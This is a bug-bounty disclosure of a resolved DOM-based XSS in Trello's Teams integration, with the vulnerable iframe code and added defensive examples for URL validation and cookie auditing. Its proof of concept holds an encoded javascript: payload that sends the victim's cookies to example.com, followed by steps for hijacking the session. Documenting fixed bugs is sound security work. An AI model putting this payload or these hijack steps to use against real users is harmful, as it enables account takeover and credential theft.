Account Takeover at https://trello.com

Disclosed by
AnkitSingh
  • Engagement Trello
  • Disclosed date over 1 year ago
  • Reward $3,600
  • Priority P2 Bugcrowd's VRT priority rating
  • Status Resolved This vulnerability has been accepted and fixed
Summary by Trello

Reflected XSS vulnerability in Trello

Summary by AnkitSingh

Description:

I've found a DOM-based XSS within the context of https://trello.com (one of the Atlassian assets) using which an attacker can take over any Trello account.

Vulnerable code:

As can be seen at https://d2k1ftgv7pobq7.cloudfront.net/meta/u/res/integrations/teams/js/7c73829d4a38a434bed5d0ff245cbd1b/tab-content-configurable.js, the provided content is loaded within an iframe without prior validation:

displayTrelloBoardIframe = () => {
    // contentUrl comes straight from the page's query string; no scheme or host check
    const a = `${contentUrl}?iframeSource=msteams`,
        o = document.getElementById("trello-board");
    o.style.width = "100%";
    o.style.height = "100%";
    // the unvalidated value is concatenated into HTML markup as the iframe src
    $("#trello-board").append('<div class="switchViews"><iframe id="trelloIframe" x-frame-options:SAMEORIGIN sandbox="allow-forms allow-modals allow-popups allow-popups-to-escape-sandbox allow-pointer-lock allow-scripts allow-same-origin" allow="geolocation *; microphone *; camera *; midi *; encrypted-media *;" data-tid="embeddedPageContainerIframe" acc-tabbable=true allowfullscreen="" src="' + a + '"></iframe></div>');
}
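For contrast, the following is an added example (not Trello's code, and not part of the original report) showing how a contentUrl parameter can be validated before it is used as an iframe source. It parses the value with the WHATWG URL API, accepts only https URLs whose host is on an assumed allowlist (the ALLOWED_EMBED_HOSTS set and the function names are assumptions for this example), and assigns the result through the DOM src property instead of concatenating it into an HTML string.

```javascript
// Added example, not Trello's code. Validates an externally supplied
// content URL before embedding it in an iframe.

// Hosts we are willing to embed; an assumed allowlist for this example.
const ALLOWED_EMBED_HOSTS = new Set(["trello.com"]);

// Returns a normalized https URL string when `raw` is safe to embed,
// otherwise null. Rejects javascript:, data:, blob:, protocol-relative
// and relative URLs, embedded credentials, and any host not allowlisted.
function safeContentUrl(raw, allowedHosts = ALLOWED_EMBED_HOSTS) {
  if (typeof raw !== "string") return null;
  let url;
  try {
    // No base URL is given, so relative and protocol-relative input throws.
    url = new URL(raw.trim());
  } catch (_) {
    return null;
  }
  // The URL parser lowercases the scheme, so "JavaScript:" fails this check too.
  if (url.protocol !== "https:") return null;
  if (!allowedHosts.has(url.hostname)) return null;
  // user:password@host is a phishing vector; refuse it outright.
  if (url.username || url.password) return null;
  return url.href;
}

// Pure helper: the final embed URL with the iframeSource parameter added,
// or null when the input was rejected. Kept separate from DOM code so it
// can be unit-tested without a browser.
function buildEmbedUrl(contentUrl) {
  const base = safeContentUrl(contentUrl);
  if (base === null) return null;
  const url = new URL(base);
  url.searchParams.set("iframeSource", "msteams");
  return url.href;
}

// Browser-side counterpart of the vulnerable function (assumes `document`).
// Builds the element with DOM APIs; no HTML string is assembled from input.
function displayTrelloBoardIframeSafely(contentUrl, container) {
  const src = buildEmbedUrl(contentUrl);
  if (src === null) {
    throw new Error("refusing to embed untrusted contentUrl");
  }
  const iframe = document.createElement("iframe");
  iframe.id = "trelloIframe";
  iframe.setAttribute("sandbox", "allow-forms allow-scripts allow-same-origin");
  iframe.src = src; // property assignment, never markup concatenation
  container.appendChild(iframe);
  return iframe;
}
```

The check is deliberately an allowlist on scheme and host rather than a denylist of "javascript:" strings: the parser canonicalizes case and whitespace for you, and anything that is not an https URL on an expected host is simply refused.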

Proof of Concept:

As a victim:

1) Visit:

https://trello.com/integrations/teams/tab-content?contentUrl=javascript:decodeURIComponent('%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%60%68%74%74%70%73%3a%2f%2f%65%78%61%6d%70%6c%65%2e%63%6f%6d%3f%70%61%72%61%6d%3d%60%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e')//

Observe that your cookies have been stolen and sent to example.com.

As an attacker:

1) Copy the cookie values stolen at example.com from the parameter param.

2) Now, in a private/incognito window of your browser, make a GET request to https://trello.com/1/Members/me?tokens=all&sessions=all&credentials=all&logins=true&enterprises=true&enterprise_fields=prefs&token_plugins=true, intercept it and send it to Repeater. Append the stolen cookie values to this request and observe the response containing the victim's details.

NOTE that this escalation in the form of session hijacking further demonstrates that the HttpOnly flag is not set on the cookies. Also, within the stolen values at example.com, observe a cookie named token. It is basically the victim's CSRF token.
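The note above turns on cookie attributes: a session cookie without HttpOnly is readable through document.cookie, which is what made the script-based theft possible. The following is an added example (not from the report or from Trello) that parses Set-Cookie response headers and reports the attributes a reviewer would look for; the header values are constructed samples, not captured Trello traffic, and the function names are assumptions for this example.

```javascript
// Added example, not Trello's code: audit Set-Cookie headers for the
// attributes that limit what a script-read or stolen cookie is worth.

// Parse one Set-Cookie header value into { name, value, attrs }.
// Attribute names are case-insensitive (RFC 6265), so they are lowercased;
// flag attributes such as HttpOnly map to true, valued ones to their string.
function parseSetCookie(header) {
  const parts = header.split(";").map((p) => p.trim()).filter(Boolean);
  const [pair = "", ...rest] = parts;
  const eq = pair.indexOf("=");
  const name = eq === -1 ? pair : pair.slice(0, eq).trim();
  const value = eq === -1 ? "" : pair.slice(eq + 1).trim();
  const attrs = {};
  for (const attr of rest) {
    const i = attr.indexOf("=");
    const key = (i === -1 ? attr : attr.slice(0, i)).trim().toLowerCase();
    attrs[key] = i === -1 ? true : attr.slice(i + 1).trim();
  }
  return { name, value, attrs };
}

// Returns a list of findings for one header; empty when nothing is missing.
function auditCookie(header) {
  const { name, attrs } = parseSetCookie(header);
  const findings = [];
  if (attrs.httponly !== true) {
    findings.push(`${name}: missing HttpOnly (readable via document.cookie)`);
  }
  if (attrs.secure !== true) {
    findings.push(`${name}: missing Secure (sent over plain http)`);
  }
  const sameSite =
    typeof attrs.samesite === "string" ? attrs.samesite.toLowerCase() : null;
  if (sameSite !== "lax" && sameSite !== "strict") {
    findings.push(`${name}: SameSite not explicitly Lax or Strict`);
  }
  return findings;
}

// Constructed sample headers for the example (not captured from Trello).
const SAMPLE_SET_COOKIE_HEADERS = [
  "token=abc123; Path=/; Secure",
  "session=xyz789; Path=/; HttpOnly; Secure; SameSite=Lax",
];

// Audit a whole response's Set-Cookie headers at once.
function auditAll(headers = SAMPLE_SET_COOKIE_HEADERS) {
  return headers.flatMap(auditCookie);
}
```

Running auditAll() over the constructed sample flags the first cookie twice (no HttpOnly, no explicit SameSite) and the second not at all. HttpOnly does not stop an XSS from acting on the victim's behalf inside the page, but it does stop the cookie value from leaving with a one-line document.cookie exfiltration like the one in the proof of concept.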

Impact:

Consequently, this gives the attacker the capability to become the admin of the associated workspace.

It would be unfortunate if such a cookie-stealing URL were emailed to many users or posted on public forums/blogs as comments, etc. All it would take from the victim's end is a single click to hand over their account to the attacker.
